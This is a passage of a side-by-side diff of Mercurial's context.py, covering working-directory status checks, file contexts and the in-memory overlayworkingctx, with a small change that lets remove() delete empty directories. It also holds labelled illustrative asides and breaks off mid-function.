1391 if not (stat.S_ISREG(st.st_mode) or stat.S_ISLNK(st.st_mode)):
1392 self._repo.ui.warn(_("copy failed: %s is not a file or a "
1392 self._repo.ui.warn(_("copy failed: %s is not a file or a "
1393 "symbolic link\n")
1393 "symbolic link\n")
1394 % self._repo.dirstate.pathto(dest))
1394 % self._repo.dirstate.pathto(dest))
1395 else:
1395 else:
1396 with self._repo.wlock():
1396 with self._repo.wlock():
1397 if self._repo.dirstate[dest] in '?':
1397 if self._repo.dirstate[dest] in '?':
1398 self._repo.dirstate.add(dest)
1398 self._repo.dirstate.add(dest)
1399 elif self._repo.dirstate[dest] in 'r':
1399 elif self._repo.dirstate[dest] in 'r':
1400 self._repo.dirstate.normallookup(dest)
1400 self._repo.dirstate.normallookup(dest)
1401 self._repo.dirstate.copy(source, dest)
1401 self._repo.dirstate.copy(source, dest)
1402
1402
1403 def match(self, pats=None, include=None, exclude=None, default='glob',
1403 def match(self, pats=None, include=None, exclude=None, default='glob',
1404 listsubrepos=False, badfn=None):
1404 listsubrepos=False, badfn=None):
1405 r = self._repo
1405 r = self._repo
1406
1406
1407 # Only a case-insensitive filesystem needs magic to translate user input
1407 # Only a case-insensitive filesystem needs magic to translate user input
1408 # to actual case in the filesystem.
1408 # to actual case in the filesystem.
1409 icasefs = not util.fscasesensitive(r.root)
1409 icasefs = not util.fscasesensitive(r.root)
1410 return matchmod.match(r.root, r.getcwd(), pats, include, exclude,
1410 return matchmod.match(r.root, r.getcwd(), pats, include, exclude,
1411 default, auditor=r.auditor, ctx=self,
1411 default, auditor=r.auditor, ctx=self,
1412 listsubrepos=listsubrepos, badfn=badfn,
1412 listsubrepos=listsubrepos, badfn=badfn,
1413 icasefs=icasefs)
1413 icasefs=icasefs)
1414
1414
1415 def _filtersuspectsymlink(self, files):
1415 def _filtersuspectsymlink(self, files):
1416 if not files or self._repo.dirstate._checklink:
1416 if not files or self._repo.dirstate._checklink:
1417 return files
1417 return files
1418
1418
1419 # Symlink placeholders may get non-symlink-like contents
1419 # Symlink placeholders may get non-symlink-like contents
1420 # via user error or dereferencing by NFS or Samba servers,
1420 # via user error or dereferencing by NFS or Samba servers,
1421 # so we filter out any placeholders that don't look like a
1421 # so we filter out any placeholders that don't look like a
1422 # symlink
1422 # symlink
1423 sane = []
1423 sane = []
1424 for f in files:
1424 for f in files:
1425 if self.flags(f) == 'l':
1425 if self.flags(f) == 'l':
1426 d = self[f].data()
1426 d = self[f].data()
1427 if (d == '' or len(d) >= 1024 or '\n' in d
1427 if (d == '' or len(d) >= 1024 or '\n' in d
1428 or stringutil.binary(d)):
1428 or stringutil.binary(d)):
1429 self._repo.ui.debug('ignoring suspect symlink placeholder'
1429 self._repo.ui.debug('ignoring suspect symlink placeholder'
1430 ' "%s"\n' % f)
1430 ' "%s"\n' % f)
1431 continue
1431 continue
1432 sane.append(f)
1432 sane.append(f)
1433 return sane
1433 return sane
1434
1434
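# An illustrative aside, not part of context.py: the placeholder test used
# above as a standalone predicate, with stringutil.binary() reduced to a
# NUL-byte check (an assumption about that helper):

def suspectplaceholder(d):
    return d == b'' or len(d) >= 1024 or b'\n' in d or b'\0' in d

assert not suspectplaceholder(b'target/file')   # plausible symlink target
assert suspectplaceholder(b'line1\nline2\n')    # real file contents leaked
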
1435 def _checklookup(self, files):
1435 def _checklookup(self, files):
1436 # check for any possibly clean files
1436 # check for any possibly clean files
1437 if not files:
1437 if not files:
1438 return [], [], []
1438 return [], [], []
1439
1439
1440 modified = []
1440 modified = []
1441 deleted = []
1441 deleted = []
1442 fixup = []
1442 fixup = []
1443 pctx = self._parents[0]
1443 pctx = self._parents[0]
1444 # do a full compare of any files that might have changed
1444 # do a full compare of any files that might have changed
1445 for f in sorted(files):
1445 for f in sorted(files):
1446 try:
1446 try:
1447 # This will return True for a file that got replaced by a
1447 # This will return True for a file that got replaced by a
1448 # directory in the interim, but fixing that is pretty hard.
1448 # directory in the interim, but fixing that is pretty hard.
1449 if (f not in pctx or self.flags(f) != pctx.flags(f)
1449 if (f not in pctx or self.flags(f) != pctx.flags(f)
1450 or pctx[f].cmp(self[f])):
1450 or pctx[f].cmp(self[f])):
1451 modified.append(f)
1451 modified.append(f)
1452 else:
1452 else:
1453 fixup.append(f)
1453 fixup.append(f)
1454 except (IOError, OSError):
1454 except (IOError, OSError):
1455 # A file became inaccessible in between? Mark it as deleted,
1455 # A file became inaccessible in between? Mark it as deleted,
1456 # matching dirstate behavior (issue5584).
1456 # matching dirstate behavior (issue5584).
1457 # The dirstate has more complex behavior around whether a
1457 # The dirstate has more complex behavior around whether a
1458 # missing file matches a directory, etc, but we don't need to
1458 # missing file matches a directory, etc, but we don't need to
1459 # bother with that: if f has made it to this point, we're sure
1459 # bother with that: if f has made it to this point, we're sure
1460 # it's in the dirstate.
1460 # it's in the dirstate.
1461 deleted.append(f)
1461 deleted.append(f)
1462
1462
1463 return modified, deleted, fixup
1463 return modified, deleted, fixup
1464
1464
1465 def _poststatusfixup(self, status, fixup):
1465 def _poststatusfixup(self, status, fixup):
1466 """update dirstate for files that are actually clean"""
1466 """update dirstate for files that are actually clean"""
1467 poststatus = self._repo.postdsstatus()
1467 poststatus = self._repo.postdsstatus()
1468 if fixup or poststatus:
1468 if fixup or poststatus:
1469 try:
1469 try:
1470 oldid = self._repo.dirstate.identity()
1470 oldid = self._repo.dirstate.identity()
1471
1471
1472 # updating the dirstate is optional
1472 # updating the dirstate is optional
1473 # so we don't wait on the lock
1473 # so we don't wait on the lock
1474 # wlock can invalidate the dirstate, so cache normal _after_
1474 # wlock can invalidate the dirstate, so cache normal _after_
1475 # taking the lock
1475 # taking the lock
1476 with self._repo.wlock(False):
1476 with self._repo.wlock(False):
1477 if self._repo.dirstate.identity() == oldid:
1477 if self._repo.dirstate.identity() == oldid:
1478 if fixup:
1478 if fixup:
1479 normal = self._repo.dirstate.normal
1479 normal = self._repo.dirstate.normal
1480 for f in fixup:
1480 for f in fixup:
1481 normal(f)
1481 normal(f)
1482 # write changes out explicitly, because nesting
1482 # write changes out explicitly, because nesting
1483 # wlock at runtime may prevent 'wlock.release()'
1483 # wlock at runtime may prevent 'wlock.release()'
1484 # after this block from doing so for subsequent
1484 # after this block from doing so for subsequent
1485 # changing files
1485 # changing files
1486 tr = self._repo.currenttransaction()
1486 tr = self._repo.currenttransaction()
1487 self._repo.dirstate.write(tr)
1487 self._repo.dirstate.write(tr)
1488
1488
1489 if poststatus:
1489 if poststatus:
1490 for ps in poststatus:
1490 for ps in poststatus:
1491 ps(self, status)
1491 ps(self, status)
1492 else:
1492 else:
1493 # in this case, writing changes out breaks
1493 # in this case, writing changes out breaks
1494 # consistency, because .hg/dirstate was
1494 # consistency, because .hg/dirstate was
1495 # already changed simultaneously after last
1495 # already changed simultaneously after last
1496 # caching (see also issue5584 for detail)
1496 # caching (see also issue5584 for detail)
1497 self._repo.ui.debug('skip updating dirstate: '
1497 self._repo.ui.debug('skip updating dirstate: '
1498 'identity mismatch\n')
1498 'identity mismatch\n')
1499 except error.LockError:
1499 except error.LockError:
1500 pass
1500 pass
1501 finally:
1501 finally:
1502 # Even if the wlock couldn't be grabbed, clear out the list.
1502 # Even if the wlock couldn't be grabbed, clear out the list.
1503 self._repo.clearpostdsstatus()
1503 self._repo.clearpostdsstatus()
1504
1504
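# An illustrative aside, not part of context.py: the optimistic-concurrency
# shape of _poststatusfixup above, with dirstate.identity() modeled as an
# opaque token read before and after the unlocked gap:

def write_if_unchanged(read_identity, write):
    oldid = read_identity()
    # ...unlocked work happens here; someone else may write the dirstate...
    if read_identity() == oldid:
        write()               # safe: nothing changed underneath us
        return True
    return False              # skip the write: identity mismatch
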
1505 def _dirstatestatus(self, match, ignored=False, clean=False, unknown=False):
1505 def _dirstatestatus(self, match, ignored=False, clean=False, unknown=False):
1506 '''Gets the status from the dirstate -- internal use only.'''
1506 '''Gets the status from the dirstate -- internal use only.'''
1507 subrepos = []
1507 subrepos = []
1508 if '.hgsub' in self:
1508 if '.hgsub' in self:
1509 subrepos = sorted(self.substate)
1509 subrepos = sorted(self.substate)
1510 cmp, s = self._repo.dirstate.status(match, subrepos, ignored=ignored,
1510 cmp, s = self._repo.dirstate.status(match, subrepos, ignored=ignored,
1511 clean=clean, unknown=unknown)
1511 clean=clean, unknown=unknown)
1512
1512
1513 # check for any possibly clean files
1513 # check for any possibly clean files
1514 fixup = []
1514 fixup = []
1515 if cmp:
1515 if cmp:
1516 modified2, deleted2, fixup = self._checklookup(cmp)
1516 modified2, deleted2, fixup = self._checklookup(cmp)
1517 s.modified.extend(modified2)
1517 s.modified.extend(modified2)
1518 s.deleted.extend(deleted2)
1518 s.deleted.extend(deleted2)
1519
1519
1520 if fixup and clean:
1520 if fixup and clean:
1521 s.clean.extend(fixup)
1521 s.clean.extend(fixup)
1522
1522
1523 self._poststatusfixup(s, fixup)
1523 self._poststatusfixup(s, fixup)
1524
1524
1525 if match.always():
1525 if match.always():
1526 # cache for performance
1526 # cache for performance
1527 if s.unknown or s.ignored or s.clean:
1527 if s.unknown or s.ignored or s.clean:
1528 # "_status" is cached with list*=False in the normal route
1528 # "_status" is cached with list*=False in the normal route
1529 self._status = scmutil.status(s.modified, s.added, s.removed,
1529 self._status = scmutil.status(s.modified, s.added, s.removed,
1530 s.deleted, [], [], [])
1530 s.deleted, [], [], [])
1531 else:
1531 else:
1532 self._status = s
1532 self._status = s
1533
1533
1534 return s
1534 return s
1535
1535
1536 @propertycache
1536 @propertycache
1537 def _manifest(self):
1537 def _manifest(self):
1538 """generate a manifest corresponding to the values in self._status
1538 """generate a manifest corresponding to the values in self._status
1539
1539
1540 This reuses the file nodeids from the parent, but we use special node
1540 This reuses the file nodeids from the parent, but we use special node
1541 identifiers for added and modified files. This is used by manifest
1541 identifiers for added and modified files. This is used by manifest
1542 merge to see that files are different and by the update logic to avoid
1542 merge to see that files are different and by the update logic to avoid
1543 deleting newly added files.
1543 deleting newly added files.
1544 """
1544 """
1545 return self._buildstatusmanifest(self._status)
1545 return self._buildstatusmanifest(self._status)
1546
1546
1547 def _buildstatusmanifest(self, status):
1547 def _buildstatusmanifest(self, status):
1548 """Builds a manifest that includes the given status results."""
1548 """Builds a manifest that includes the given status results."""
1549 parents = self.parents()
1549 parents = self.parents()
1550
1550
1551 man = parents[0].manifest().copy()
1551 man = parents[0].manifest().copy()
1552
1552
1553 ff = self._flagfunc
1553 ff = self._flagfunc
1554 for i, l in ((addednodeid, status.added),
1554 for i, l in ((addednodeid, status.added),
1555 (modifiednodeid, status.modified)):
1555 (modifiednodeid, status.modified)):
1556 for f in l:
1556 for f in l:
1557 man[f] = i
1557 man[f] = i
1558 try:
1558 try:
1559 man.setflag(f, ff(f))
1559 man.setflag(f, ff(f))
1560 except OSError:
1560 except OSError:
1561 pass
1561 pass
1562
1562
1563 for f in status.deleted + status.removed:
1563 for f in status.deleted + status.removed:
1564 if f in man:
1564 if f in man:
1565 del man[f]
1565 del man[f]
1566
1566
1567 return man
1567 return man
1568
1568
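# An illustrative aside, not part of context.py: sentinel node ids make
# added/modified files compare unequal to any stored revision; a toy
# version over plain dicts:

addednodeid, modifiednodeid = b'a' * 20, b'm' * 20

def statusmanifest(parentman, added, modified, removed):
    man = dict(parentman)
    for f in added:
        man[f] = addednodeid
    for f in modified:
        man[f] = modifiednodeid
    for f in removed:
        man.pop(f, None)
    return man

man = statusmanifest({'f': b'\x11' * 20}, [], ['f'], [])
assert man['f'] == modifiednodeid   # guaranteed to differ from the parent
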
1569 def _buildstatus(self, other, s, match, listignored, listclean,
1569 def _buildstatus(self, other, s, match, listignored, listclean,
1570 listunknown):
1570 listunknown):
1571 """build a status with respect to another context
1571 """build a status with respect to another context
1572
1572
1573 This includes logic for maintaining the fast path of status when
1573 This includes logic for maintaining the fast path of status when
1574 comparing the working directory against its parent, which is to skip
1574 comparing the working directory against its parent, which is to skip
1575 building a new manifest if self (working directory) is not comparing
1575 building a new manifest if self (working directory) is not comparing
1576 against its parent (repo['.']).
1576 against its parent (repo['.']).
1577 """
1577 """
1578 s = self._dirstatestatus(match, listignored, listclean, listunknown)
1578 s = self._dirstatestatus(match, listignored, listclean, listunknown)
1579 # Filter out symlinks that, in the case of FAT32 and NTFS filesystems,
1579 # Filter out symlinks that, in the case of FAT32 and NTFS filesystems,
1580 # might have accidentally ended up with the entire contents of the file
1580 # might have accidentally ended up with the entire contents of the file
1581 # they are supposed to be linking to.
1581 # they are supposed to be linking to.
1582 s.modified[:] = self._filtersuspectsymlink(s.modified)
1582 s.modified[:] = self._filtersuspectsymlink(s.modified)
1583 if other != self._repo['.']:
1583 if other != self._repo['.']:
1584 s = super(workingctx, self)._buildstatus(other, s, match,
1584 s = super(workingctx, self)._buildstatus(other, s, match,
1585 listignored, listclean,
1585 listignored, listclean,
1586 listunknown)
1586 listunknown)
1587 return s
1587 return s
1588
1588
1589 def _matchstatus(self, other, match):
1589 def _matchstatus(self, other, match):
1590 """override the match method with a filter for directory patterns
1590 """override the match method with a filter for directory patterns
1591
1591
1592 We use inheritance to customize the match.bad method only in cases of
1592 We use inheritance to customize the match.bad method only in cases of
1593 workingctx since it belongs only to the working directory when
1593 workingctx since it belongs only to the working directory when
1594 comparing against the parent changeset.
1594 comparing against the parent changeset.
1595
1595
1596 If we aren't comparing against the working directory's parent, then we
1596 If we aren't comparing against the working directory's parent, then we
1597 just use the default match object sent to us.
1597 just use the default match object sent to us.
1598 """
1598 """
1599 if other != self._repo['.']:
1599 if other != self._repo['.']:
1600 def bad(f, msg):
1600 def bad(f, msg):
1601 # 'f' may be a directory pattern from 'match.files()',
1601 # 'f' may be a directory pattern from 'match.files()',
1602 # so 'f not in ctx1' is not enough
1602 # so 'f not in ctx1' is not enough
1603 if f not in other and not other.hasdir(f):
1603 if f not in other and not other.hasdir(f):
1604 self._repo.ui.warn('%s: %s\n' %
1604 self._repo.ui.warn('%s: %s\n' %
1605 (self._repo.dirstate.pathto(f), msg))
1605 (self._repo.dirstate.pathto(f), msg))
1606 match.bad = bad
1606 match.bad = bad
1607 return match
1607 return match
1608
1608
1609 def markcommitted(self, node):
1609 def markcommitted(self, node):
1610 super(workingctx, self).markcommitted(node)
1610 super(workingctx, self).markcommitted(node)
1611
1611
1612 sparse.aftercommit(self._repo, node)
1612 sparse.aftercommit(self._repo, node)
1613
1613
1614 class committablefilectx(basefilectx):
1614 class committablefilectx(basefilectx):
1615 """A committablefilectx provides common functionality for a file context
1615 """A committablefilectx provides common functionality for a file context
1616 that wants the ability to commit, e.g. workingfilectx or memfilectx."""
1616 that wants the ability to commit, e.g. workingfilectx or memfilectx."""
1617 def __init__(self, repo, path, filelog=None, ctx=None):
1617 def __init__(self, repo, path, filelog=None, ctx=None):
1618 self._repo = repo
1618 self._repo = repo
1619 self._path = path
1619 self._path = path
1620 self._changeid = None
1620 self._changeid = None
1621 self._filerev = self._filenode = None
1621 self._filerev = self._filenode = None
1622
1622
1623 if filelog is not None:
1623 if filelog is not None:
1624 self._filelog = filelog
1624 self._filelog = filelog
1625 if ctx:
1625 if ctx:
1626 self._changectx = ctx
1626 self._changectx = ctx
1627
1627
1628 def __nonzero__(self):
1628 def __nonzero__(self):
1629 return True
1629 return True
1630
1630
1631 __bool__ = __nonzero__
1631 __bool__ = __nonzero__
1632
1632
1633 def linkrev(self):
1633 def linkrev(self):
1634 # linked to self._changectx no matter if file is modified or not
1634 # linked to self._changectx no matter if file is modified or not
1635 return self.rev()
1635 return self.rev()
1636
1636
1637 def parents(self):
1637 def parents(self):
1638 '''return parent filectxs, following copies if necessary'''
1638 '''return parent filectxs, following copies if necessary'''
1639 def filenode(ctx, path):
1639 def filenode(ctx, path):
1640 return ctx._manifest.get(path, nullid)
1640 return ctx._manifest.get(path, nullid)
1641
1641
1642 path = self._path
1642 path = self._path
1643 fl = self._filelog
1643 fl = self._filelog
1644 pcl = self._changectx._parents
1644 pcl = self._changectx._parents
1645 renamed = self.renamed()
1645 renamed = self.renamed()
1646
1646
1647 if renamed:
1647 if renamed:
1648 pl = [renamed + (None,)]
1648 pl = [renamed + (None,)]
1649 else:
1649 else:
1650 pl = [(path, filenode(pcl[0], path), fl)]
1650 pl = [(path, filenode(pcl[0], path), fl)]
1651
1651
1652 for pc in pcl[1:]:
1652 for pc in pcl[1:]:
1653 pl.append((path, filenode(pc, path), fl))
1653 pl.append((path, filenode(pc, path), fl))
1654
1654
1655 return [self._parentfilectx(p, fileid=n, filelog=l)
1655 return [self._parentfilectx(p, fileid=n, filelog=l)
1656 for p, n, l in pl if n != nullid]
1656 for p, n, l in pl if n != nullid]
1657
1657
1658 def children(self):
1658 def children(self):
1659 return []
1659 return []
1660
1660
1661 class workingfilectx(committablefilectx):
1661 class workingfilectx(committablefilectx):
1662 """A workingfilectx object makes access to data related to a particular
1662 """A workingfilectx object makes access to data related to a particular
1663 file in the working directory convenient."""
1663 file in the working directory convenient."""
1664 def __init__(self, repo, path, filelog=None, workingctx=None):
1664 def __init__(self, repo, path, filelog=None, workingctx=None):
1665 super(workingfilectx, self).__init__(repo, path, filelog, workingctx)
1665 super(workingfilectx, self).__init__(repo, path, filelog, workingctx)
1666
1666
1667 @propertycache
1667 @propertycache
1668 def _changectx(self):
1668 def _changectx(self):
1669 return workingctx(self._repo)
1669 return workingctx(self._repo)
1670
1670
1671 def data(self):
1671 def data(self):
1672 return self._repo.wread(self._path)
1672 return self._repo.wread(self._path)
1673 def renamed(self):
1673 def renamed(self):
1674 rp = self._repo.dirstate.copied(self._path)
1674 rp = self._repo.dirstate.copied(self._path)
1675 if not rp:
1675 if not rp:
1676 return None
1676 return None
1677 return rp, self._changectx._parents[0]._manifest.get(rp, nullid)
1677 return rp, self._changectx._parents[0]._manifest.get(rp, nullid)
1678
1678
1679 def size(self):
1679 def size(self):
1680 return self._repo.wvfs.lstat(self._path).st_size
1680 return self._repo.wvfs.lstat(self._path).st_size
1681 def date(self):
1681 def date(self):
1682 t, tz = self._changectx.date()
1682 t, tz = self._changectx.date()
1683 try:
1683 try:
1684 return (self._repo.wvfs.lstat(self._path)[stat.ST_MTIME], tz)
1684 return (self._repo.wvfs.lstat(self._path)[stat.ST_MTIME], tz)
1685 except OSError as err:
1685 except OSError as err:
1686 if err.errno != errno.ENOENT:
1686 if err.errno != errno.ENOENT:
1687 raise
1687 raise
1688 return (t, tz)
1688 return (t, tz)
1689
1689
1690 def exists(self):
1690 def exists(self):
1691 return self._repo.wvfs.exists(self._path)
1691 return self._repo.wvfs.exists(self._path)
1692
1692
1693 def lexists(self):
1693 def lexists(self):
1694 return self._repo.wvfs.lexists(self._path)
1694 return self._repo.wvfs.lexists(self._path)
1695
1695
1696 def audit(self):
1696 def audit(self):
1697 return self._repo.wvfs.audit(self._path)
1697 return self._repo.wvfs.audit(self._path)
1698
1698
1699 def cmp(self, fctx):
1699 def cmp(self, fctx):
1700 """compare with other file context
1700 """compare with other file context
1701
1701
1702 returns True if different from fctx.
1702 returns True if different from fctx.
1703 """
1703 """
1704 # fctx should be a filectx (not a workingfilectx)
1704 # fctx should be a filectx (not a workingfilectx)
1705 # invert comparison to reuse the same code path
1705 # invert comparison to reuse the same code path
1706 return fctx.cmp(self)
1706 return fctx.cmp(self)
1707
1707
1708 def remove(self, ignoremissing=False):
1708 def remove(self, ignoremissing=False):
1709 """wraps unlink for a repo's working directory"""
1709 """wraps unlink for a repo's working directory"""
1710 self._repo.wvfs.unlinkpath(self._path, ignoremissing=ignoremissing)
1710 rmdir = self._repo.ui.configbool('experimental', 'removeemptydirs')
1711 self._repo.wvfs.unlinkpath(self._path, ignoremissing=ignoremissing,
1712 rmdir=rmdir)
1711
1713
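# An illustrative aside, not part of context.py: the semantics selected by
# the new rmdir flag above, reduced to os-level calls (vfs.unlinkpath
# itself lives elsewhere; this is a sketch of the behavior, not the real
# helper):

import os

def unlinkpath(path, rmdir=True):
    os.unlink(path)
    if rmdir:
        try:
            os.removedirs(os.path.dirname(path))  # prune now-empty parents
        except OSError:
            pass                                  # parent not empty: keep it
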
1712 def write(self, data, flags, backgroundclose=False, **kwargs):
1714 def write(self, data, flags, backgroundclose=False, **kwargs):
1713 """wraps repo.wwrite"""
1715 """wraps repo.wwrite"""
1714 self._repo.wwrite(self._path, data, flags,
1716 self._repo.wwrite(self._path, data, flags,
1715 backgroundclose=backgroundclose,
1717 backgroundclose=backgroundclose,
1716 **kwargs)
1718 **kwargs)
1717
1719
1718 def markcopied(self, src):
1720 def markcopied(self, src):
1719 """marks this file a copy of `src`"""
1721 """marks this file a copy of `src`"""
1720 if self._repo.dirstate[self._path] in "nma":
1722 if self._repo.dirstate[self._path] in "nma":
1721 self._repo.dirstate.copy(src, self._path)
1723 self._repo.dirstate.copy(src, self._path)
1722
1724
1723 def clearunknown(self):
1725 def clearunknown(self):
1724 """Removes conflicting items in the working directory so that
1726 """Removes conflicting items in the working directory so that
1725 ``write()`` can be called successfully.
1727 ``write()`` can be called successfully.
1726 """
1728 """
1727 wvfs = self._repo.wvfs
1729 wvfs = self._repo.wvfs
1728 f = self._path
1730 f = self._path
1729 wvfs.audit(f)
1731 wvfs.audit(f)
1730 if wvfs.isdir(f) and not wvfs.islink(f):
1732 if wvfs.isdir(f) and not wvfs.islink(f):
1731 wvfs.rmtree(f, forcibly=True)
1733 wvfs.rmtree(f, forcibly=True)
1732 if self._repo.ui.configbool('experimental', 'merge.checkpathconflicts'):
1734 if self._repo.ui.configbool('experimental', 'merge.checkpathconflicts'):
1733 for p in reversed(list(util.finddirs(f))):
1735 for p in reversed(list(util.finddirs(f))):
1734 if wvfs.isfileorlink(p):
1736 if wvfs.isfileorlink(p):
1735 wvfs.unlink(p)
1737 wvfs.unlink(p)
1736 break
1738 break
1737
1739
1738 def setflags(self, l, x):
1740 def setflags(self, l, x):
1739 self._repo.wvfs.setflags(self._path, l, x)
1741 self._repo.wvfs.setflags(self._path, l, x)
1740
1742
1741 class overlayworkingctx(committablectx):
1743 class overlayworkingctx(committablectx):
1742 """Wraps another mutable context with a write-back cache that can be
1744 """Wraps another mutable context with a write-back cache that can be
1743 converted into a commit context.
1745 converted into a commit context.
1744
1746
1745 self._cache[path] maps to a dict with keys: {
1747 self._cache[path] maps to a dict with keys: {
1746 'exists': bool?
1748 'exists': bool?
1747 'date': date?
1749 'date': date?
1748 'data': str?
1750 'data': str?
1749 'flags': str?
1751 'flags': str?
1750 'copied': str? (path or None)
1752 'copied': str? (path or None)
1751 }
1753 }
1752 If `exists` is True, `flags` and `date` must be non-None. If it
1752 If `exists` is True, `flags` and `date` must be non-None. If it
1753 is `False`, the file was deleted.
1753 is `False`, the file was deleted.
1754 """
1756 """
1755
1757
    def __init__(self, repo):
        super(overlayworkingctx, self).__init__(repo)
        self.clean()

    def setbase(self, wrappedctx):
        self._wrappedctx = wrappedctx
        self._parents = [wrappedctx]
        # Drop old manifest cache as it is now out of date.
        # This is necessary when, e.g., rebasing several nodes with one
        # ``overlayworkingctx`` (e.g. with --collapse).
        util.clearcachedproperty(self, '_manifest')

    def data(self, path):
        if self.isdirty(path):
            if self._cache[path]['exists']:
                if self._cache[path]['data']:
                    return self._cache[path]['data']
                else:
                    # Must fallback here, too, because we only set flags.
                    return self._wrappedctx[path].data()
            else:
                raise error.ProgrammingError("No such file or directory: %s" %
                                             path)
        else:
            return self._wrappedctx[path].data()

    @propertycache
    def _manifest(self):
        parents = self.parents()
        man = parents[0].manifest().copy()

        flag = self._flagfunc
        for path in self.added():
            man[path] = addednodeid
            man.setflag(path, flag(path))
        for path in self.modified():
            man[path] = modifiednodeid
            man.setflag(path, flag(path))
        for path in self.removed():
            del man[path]
        return man

    @propertycache
    def _flagfunc(self):
        def f(path):
            return self._cache[path]['flags']
        return f

    def files(self):
        return sorted(self.added() + self.modified() + self.removed())

    def modified(self):
        return [f for f in self._cache.keys() if self._cache[f]['exists'] and
                self._existsinparent(f)]

    def added(self):
        return [f for f in self._cache.keys() if self._cache[f]['exists'] and
                not self._existsinparent(f)]

    def removed(self):
        return [f for f in self._cache.keys() if
                not self._cache[f]['exists'] and self._existsinparent(f)]

    def isinmemory(self):
        return True

    def filedate(self, path):
        if self.isdirty(path):
            return self._cache[path]['date']
        else:
            return self._wrappedctx[path].date()

    def markcopied(self, path, origin):
        if self.isdirty(path):
            self._cache[path]['copied'] = origin
        else:
            raise error.ProgrammingError('markcopied() called on clean context')

    def copydata(self, path):
        if self.isdirty(path):
            return self._cache[path]['copied']
        else:
            raise error.ProgrammingError('copydata() called on clean context')

    def flags(self, path):
        if self.isdirty(path):
            if self._cache[path]['exists']:
                return self._cache[path]['flags']
            else:
                raise error.ProgrammingError("No such file or directory: %s" %
                                             path)
        else:
            return self._wrappedctx[path].flags()

    def _existsinparent(self, path):
        try:
            # ``commitctx`` raises a ``ManifestLookupError`` if a path does not
            # exist, unlike ``workingctx``, which returns a ``workingfilectx``
            # with an ``exists()`` function.
            self._wrappedctx[path]
            return True
        except error.ManifestLookupError:
            return False

    def _auditconflicts(self, path):
        """Replicates conflict checks done by wvfs.write().

        Since we never write to the filesystem and never call `applyupdates` in
        IMM, we'll never check that a path is actually writable -- e.g., because
        it adds `a/foo`, but `a` is actually a file in the other commit.
        """
        def fail(path, component):
            # p1() is the base and we're receiving "writes" for p2()'s
            # files.
            if 'l' in self.p1()[component].flags():
                raise error.Abort("error: %s conflicts with symlink %s "
                                  "in %s." % (path, component,
                                              self.p1().rev()))
            else:
                raise error.Abort("error: '%s' conflicts with file '%s' in "
                                  "%s." % (path, component,
                                           self.p1().rev()))

        # Test that each new directory to be created to write this path from p2
        # is not a file in p1.
        components = path.split('/')
        for i in xrange(len(components)):
            component = "/".join(components[0:i])
            if component in self.p1():
                fail(path, component)

        # Test the other direction -- that this path from p2 isn't a directory
        # in p1 (test that p1 doesn't have any paths matching `path/*`).
        match = matchmod.match('/', '', [path + '/'], default=b'relpath')
        matches = self.p1().manifest().matches(match)
        if len(matches) > 0:
            if len(matches) == 1 and matches.keys()[0] == path:
                return
            raise error.Abort("error: file '%s' cannot be written because "
                              " '%s/' is a folder in %s (containing %d "
                              "entries: %s)"
                              % (path, path, self.p1(), len(matches),
                                 ', '.join(matches.keys())))

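    # Illustration (paths hypothetical) of the two directions checked above:
    # if p1 tracks a file 'a', writing 'a/foo' must abort, since 'a' cannot
    # be both a file and a directory; conversely, if p1 tracks 'dir/one',
    # writing a file named 'dir' must abort as well:
    #
    #     ovctx.write('a/foo', 'data')   # aborts: conflicts with file 'a'
    #     ovctx.write('dir', 'data')     # aborts: 'dir/' is a folder in p1
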
    def write(self, path, data, flags='', **kwargs):
        if data is None:
            raise error.ProgrammingError("data must be non-None")
        self._auditconflicts(path)
        self._markdirty(path, exists=True, data=data, date=dateutil.makedate(),
                        flags=flags)

    def setflags(self, path, l, x):
        self._markdirty(path, exists=True, date=dateutil.makedate(),
                        flags=(l and 'l' or '') + (x and 'x' or ''))

    def remove(self, path):
        self._markdirty(path, exists=False)

    def exists(self, path):
        """exists behaves like `lexists`, but needs to follow symlinks and
        return False if they are broken.
        """
        if self.isdirty(path):
            # If this path exists and is a symlink, "follow" it by calling
            # exists on the destination path.
            if (self._cache[path]['exists'] and
                    'l' in self._cache[path]['flags']):
                return self.exists(self._cache[path]['data'].strip())
            else:
                return self._cache[path]['exists']

        return self._existsinparent(path)

    def lexists(self, path):
        """lexists returns True if the path exists"""
        if self.isdirty(path):
            return self._cache[path]['exists']

        return self._existsinparent(path)

    def size(self, path):
        if self.isdirty(path):
            if self._cache[path]['exists']:
                return len(self._cache[path]['data'])
            else:
                raise error.ProgrammingError("No such file or directory: %s" %
                                             path)
        return self._wrappedctx[path].size()

    def tomemctx(self, text, branch=None, extra=None, date=None, parents=None,
                 user=None, editor=None):
        """Converts this ``overlayworkingctx`` into a ``memctx`` ready to be
        committed.

        ``text`` is the commit message.
        ``parents`` (optional) are rev numbers.
        """
        # Default parents to the wrapped context's if not passed.
        if parents is None:
            parents = self._wrappedctx.parents()
            if len(parents) == 1:
                parents = (parents[0], None)

        # ``parents`` is passed as rev numbers; convert to ``commitctxs``.
        if parents[1] is None:
            parents = (self._repo[parents[0]], None)
        else:
            parents = (self._repo[parents[0]], self._repo[parents[1]])

        files = self._cache.keys()
        def getfile(repo, memctx, path):
            if self._cache[path]['exists']:
                return memfilectx(repo, memctx, path,
                                  self._cache[path]['data'],
                                  'l' in self._cache[path]['flags'],
                                  'x' in self._cache[path]['flags'],
                                  self._cache[path]['copied'])
            else:
                # Returning None, but including the path in `files`, is
                # necessary for memctx to register a deletion.
                return None
        return memctx(self._repo, parents, text, files, getfile, date=date,
                      extra=extra, user=user, branch=branch, editor=editor)

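    # A hedged sketch of the intended flow (driver code hypothetical): an
    # in-memory rebase accumulates writes in the overlay, then turns the
    # result into a commit without touching the working directory:
    #
    #     wctx = overlayworkingctx(repo)
    #     wctx.setbase(repo['.'])
    #     wctx.write('a.txt', 'new contents\n')
    #     mctx = wctx.tomemctx('rebased commit', user='someone')
    #     node = mctx.commit()
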
    def isdirty(self, path):
        return path in self._cache

    def isempty(self):
        # We need to discard any keys that are actually clean before the empty
        # commit check.
        self._compact()
        return len(self._cache) == 0

    def clean(self):
        self._cache = {}

    def _compact(self):
        """Removes keys from the cache that are actually clean, by comparing
        them with the underlying context.

        This can occur during the merge process, e.g. by passing --tool :local
        to resolve a conflict.
        """
        keys = []
        for path in self._cache.keys():
            cache = self._cache[path]
            try:
                underlying = self._wrappedctx[path]
                if (underlying.data() == cache['data'] and
                        underlying.flags() == cache['flags']):
                    keys.append(path)
            except error.ManifestLookupError:
                # Path not in the underlying manifest (created).
                continue

        for path in keys:
            del self._cache[path]
        return keys

    def _markdirty(self, path, exists, data=None, date=None, flags=''):
        self._cache[path] = {
            'exists': exists,
